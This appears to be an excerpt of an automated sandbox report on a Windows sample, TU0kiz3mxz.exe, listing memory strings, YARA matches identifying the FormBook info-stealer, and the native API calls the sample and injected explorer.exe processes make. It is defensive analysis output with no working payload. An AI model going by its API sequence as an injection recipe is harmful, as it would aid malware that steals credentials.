          Source: explorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.comatio
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000004.00000000.1709658723.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: TU0kiz3mxz.exe PID: 1148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 3584, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A320 NtCreateFile,3_2_0041A320
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A3D0 NtReadFile,3_2_0041A3D0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A450 NtClose,3_2_0041A450
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A500 NtAllocateVirtualMemory,3_2_0041A500
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A44B NtClose,3_2_0041A44B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041A4FB NtAllocateVirtualMemory,3_2_0041A4FB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102B60 NtClose,LdrInitializeThunk,3_2_01102B60
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01102BF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102AD0 NtReadFile,LdrInitializeThunk,3_2_01102AD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01102D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01102D30
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102DD0 NtDelayExecution,LdrInitializeThunk,3_2_01102DD0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01102DF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01102C70
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01102CA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102F30 NtCreateSection,LdrInitializeThunk,3_2_01102F30
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01102F90
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102FB0 NtResumeThread,LdrInitializeThunk,3_2_01102FB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102FE0 NtCreateFile,LdrInitializeThunk,3_2_01102FE0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01102E80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01102EA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01104340 NtSetContextThread,3_2_01104340
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01104650 NtSuspendThread,3_2_01104650
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102B80 NtQueryInformationFile,3_2_01102B80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102BA0 NtEnumerateValueKey,3_2_01102BA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102BE0 NtQueryValueKey,3_2_01102BE0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102AB0 NtWaitForSingleObject,3_2_01102AB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102AF0 NtWriteFile,3_2_01102AF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102D00 NtSetInformationFile,3_2_01102D00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102DB0 NtEnumerateKey,3_2_01102DB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102C00 NtQueryInformationProcess,3_2_01102C00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102C60 NtCreateKey,3_2_01102C60
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102CC0 NtQueryVirtualMemory,3_2_01102CC0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102CF0 NtOpenProcess,3_2_01102CF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102F60 NtCreateProcessEx,3_2_01102F60
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102FA0 NtQuerySection,3_2_01102FA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102E30 NtWriteVirtualMemory,3_2_01102E30
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01102EE0 NtQueueApcThread,3_2_01102EE0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01103010 NtOpenDirectoryObject,3_2_01103010
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01103090 NtSetValueKey,3_2_01103090
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011035C0 NtCreateMutant,3_2_011035C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011039B0 NtGetContextThread,3_2_011039B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01103D10 NtOpenProcessToken,3_2_01103D10
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01103D70 NtOpenThread,3_2_01103D70
          Source: C:\Windows\explorer.exeCode function: 4_2_0E910E12 NtProtectVirtualMemory,4_2_0E910E12
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90F232 NtCreateFile,4_2_0E90F232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E910E0A NtProtectVirtualMemory,4_2_0E910E0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04C22CA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22C60 NtCreateKey,LdrInitializeThunk,5_2_04C22C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04C22C70
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22DD0 NtDelayExecution,LdrInitializeThunk,5_2_04C22DD0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04C22DF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04C22D10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04C22EA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22FE0 NtCreateFile,LdrInitializeThunk,5_2_04C22FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22F30 NtCreateSection,LdrInitializeThunk,5_2_04C22F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22AD0 NtReadFile,LdrInitializeThunk,5_2_04C22AD0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04C22BE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04C22BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22B60 NtClose,LdrInitializeThunk,5_2_04C22B60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C235C0 NtCreateMutant,LdrInitializeThunk,5_2_04C235C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C24650 NtSuspendThread,5_2_04C24650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C24340 NtSetContextThread,5_2_04C24340
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22CC0 NtQueryVirtualMemory,5_2_04C22CC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22CF0 NtOpenProcess,5_2_04C22CF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22C00 NtQueryInformationProcess,5_2_04C22C00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22DB0 NtEnumerateKey,5_2_04C22DB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22D00 NtSetInformationFile,5_2_04C22D00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22D30 NtUnmapViewOfSection,5_2_04C22D30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22EE0 NtQueueApcThread,5_2_04C22EE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22E80 NtReadVirtualMemory,5_2_04C22E80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22E30 NtWriteVirtualMemory,5_2_04C22E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22F90 NtProtectVirtualMemory,5_2_04C22F90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22FA0 NtQuerySection,5_2_04C22FA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22FB0 NtResumeThread,5_2_04C22FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22F60 NtCreateProcessEx,5_2_04C22F60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22AF0 NtWriteFile,5_2_04C22AF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22AB0 NtWaitForSingleObject,5_2_04C22AB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22B80 NtQueryInformationFile,5_2_04C22B80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C22BA0 NtEnumerateValueKey,5_2_04C22BA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C23090 NtSetValueKey,5_2_04C23090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C23010 NtOpenDirectoryObject,5_2_04C23010
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C23D70 NtOpenThread,5_2_04C23D70
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C23D10 NtOpenProcessToken,5_2_04C23D10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C239B0 NtGetContextThread,5_2_04C239B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A3D0 NtReadFile,5_2_0296A3D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A320 NtCreateFile,5_2_0296A320
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A450 NtClose,5_2_0296A450
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A500 NtAllocateVirtualMemory,5_2_0296A500
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A4FB NtAllocateVirtualMemory,5_2_0296A4FB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296A44B NtClose,5_2_0296A44B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_04AAA036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_04AA9BAF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAA042 NtQueryInformationProcess,5_2_04AAA042
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_04AA9BB2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_0242D5BC0_2_0242D5BC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_04BD00060_2_04BD0006
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_04BD00400_2_04BD0040
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_0870C8200_2_0870C820
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_0870C8100_2_0870C810
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_0870F9F00_2_0870F9F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 0_2_0870F5B80_2_0870F5B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D9043_2_0041D904
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041DBD73_2_0041DBD7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041E5413_2_0041E541
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D5663_2_0041D566
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00409E4B3_2_00409E4B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00409E503_2_00409E50
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041E7A93_2_0041E7A9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C01003_2_010C0100
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116A1183_2_0116A118
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011581583_2_01158158
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011901AA3_2_011901AA
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011841A23_2_011841A2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011881CC3_2_011881CC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011620003_2_01162000
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118A3523_2_0118A352
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DE3F03_2_010DE3F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011903E63_2_011903E6
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011702743_2_01170274
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011502C03_2_011502C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D05353_2_010D0535
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011905913_2_01190591
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011744203_2_01174420
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011824463_2_01182446
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117E4F63_2_0117E4F6
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F47503_2_010F4750
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D07703_2_010D0770
